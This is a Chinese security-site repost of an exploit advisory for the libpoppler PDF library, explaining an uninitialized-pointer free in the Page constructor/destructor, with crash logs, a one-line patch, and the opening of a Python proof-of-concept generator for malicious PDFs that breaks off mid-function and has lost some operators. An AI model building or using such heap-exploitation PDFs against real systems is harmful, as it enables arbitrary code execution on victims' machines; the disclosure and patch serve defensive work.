• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Poppler

Poppler

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Poppler ,其中包含poppler qt5,poppler data,qt poppler,poppler utils,poppler qt4等知识点,遇到此问题的同学们可以参考下
##########################################################################
#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar ####
#### updates in http://felipe.andres.manzano.googlepages.com/home ####
##########################################################################
'''


Sumary:
=======

The libpoppler pdf rendering library, can free uninitialized pointers,
leading to arbitrary code execution. This vulnerability results from
memory management bugs in the Page class constructor/destructor.


Technical Description - Exploit/Concept Code:
=============================================

Tests were performed using libpoppler util pdftotext taken from
git://git.freedesktop.org/git/poppler/poppler.
Other version where tried succesfully (the ones shiped with
debian/gentoo).

In the initialization of a Page object and under certain conditions a
member object skips initialization, but then is eventualy deleted. This
can be conducted to the situation in which an arbitrary pointer is
passed to the libc free and so the it gets apropiate for the malloc
maleficarum to enter the scene.

Look at the Page class constructor on Page.cc:231. First at the begining
of the function the member object pageWidgets isnt initialized then it
tries to check if the type of the annotations proposed on the pdf file
ar correct; if not it bails out to the label err2. Note that is some
incorcondance on the type of the anotation arise the member variable
pageWidgets is never initialized!

Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {
Object tmp;
[...]
// annotations
pageDict->lookupNF("Annots", &annots);
if (!(annots.isRef() || annots.isArray() || annots.isNull())) {
error(-1, "Page annotations object (page %d) is wrong type (%s)",
num, annots.getTypeName());
annots.free();
goto err2;
}

// forms
pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form);
tmp.free();
[...]
err2:
annots.initNull();
err1:
contents.initNull();
ok = gFalse;
}

But in the Page class destructor, Page.cc:309, pageWidgets is deleted
without any consideration. The Page destructor is inmediatelly called
after the erroneous Page construction.

Page::~Page() {
delete pageWidgets;
delete attrs;
annots.free();
contents.free();
}


It is worth mentioning that the pdf rendering scenario is friendly with
the heap massage technics because you will find lots of ways to allocate
or allocate/free memory in the already probided functionality. In the
POC I have used repetidely the 'name' of the fields of a pdf dictionary
to allocate memory. Each name allocates up to 127bytes and apparently
there is no limit in the number of fields.


The following excerpt is a sample verification of the existence of
the problem :

localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf
localhost expl-poppler # pdftotext test.pdf
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Annotation rectangle is wrong type
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Page annotations object (page 3) is wrong type (integer)
Error: Page count in top-level pages object is incorrect
Error: Couldnt read page catalog
Trace/breakpoint trap

:)


Further research should be done to accomodate the heap for other applications like evince:
localhost expl-poppler # evince test.pdf

(evince:8912): GnomeUI-WARNING **: While connecting to session manager:
Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed.

** (evince:8912): WARNING **: Service registration failed.

** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Annotation rectangle is wrong type
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Page annotations object (page 3) is wrong type (integer)
*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 ***

Note that 0x08100468 is still a provided pointer. But in this try some
malloc structure like _heap_info (see. house of mind) is not correctly
aligned any more. Maybe evince-thumbnailer which is (probably
monothreaded) is an easier target.


Patch
=====

diff --git a/poppler/Page.cc b/poppler/Page.cc
index b28a3ee..72a706b 100644
--- a/poppler/Page.cc
b/poppler/Page.cc
@@ -230,7 230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) {

Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {
Object tmp;
-
pageWidgets = NULL; //Security fix
ok = gTrue;
xref = xrefA;
num = numA;


POC:
===

Written in pyploit. It can be used 2 ways , one selecting a preconfigured
target like *gentoo-pdftotext* or the other in which you could pass some
malloc/free execution trace moddifing parameters.

'''

import struct
import struct
import math
import os

import sys

## print "%.400f"%d wont work :( ... so a quick double printing class
class Doubles:
def __init__(self, precision=400):
self.precision=precision

def pdficateint(self,i1,i2):
s = struct.pack("@L",i1) struct.pack("@L",i2)
return self.pdficatestr(s)

def pdficate(self,s):
rslt = " "
for pos in range (0,len(s)/8):
rslt =self.pdficatestr(s[(pos*8):(pos*8) 8]) " "
return rslt;

def pdficatestr(self, s):
d = struct.unpack("d",s)[0]
rslt=" "
if(d<0.0):
rslt ="-"
d=-d
rslt ="%d."%int(math.floor(d))
myd=math.floor(d)
scale=0.1
nines=0
for p in range(1,self.precision):
for i in range(1,10):
if (myd scale*i) > d:
i-=1
break
if i==9:
if nines>6:
return rslt
else:

您可能想查找下面的文章:

  • Poppler

相关文章

  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Mole Group Real Estate Script
  • BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
  • AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
  • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
  • IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
  • Joomla Component n-forms 1.01 Blind SQL Injection Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
  • Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
    • Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
    • BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
    • Galatolo Web Manager 1.3a
    • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
    • e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
    • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
    • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
    • IceBB
    • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有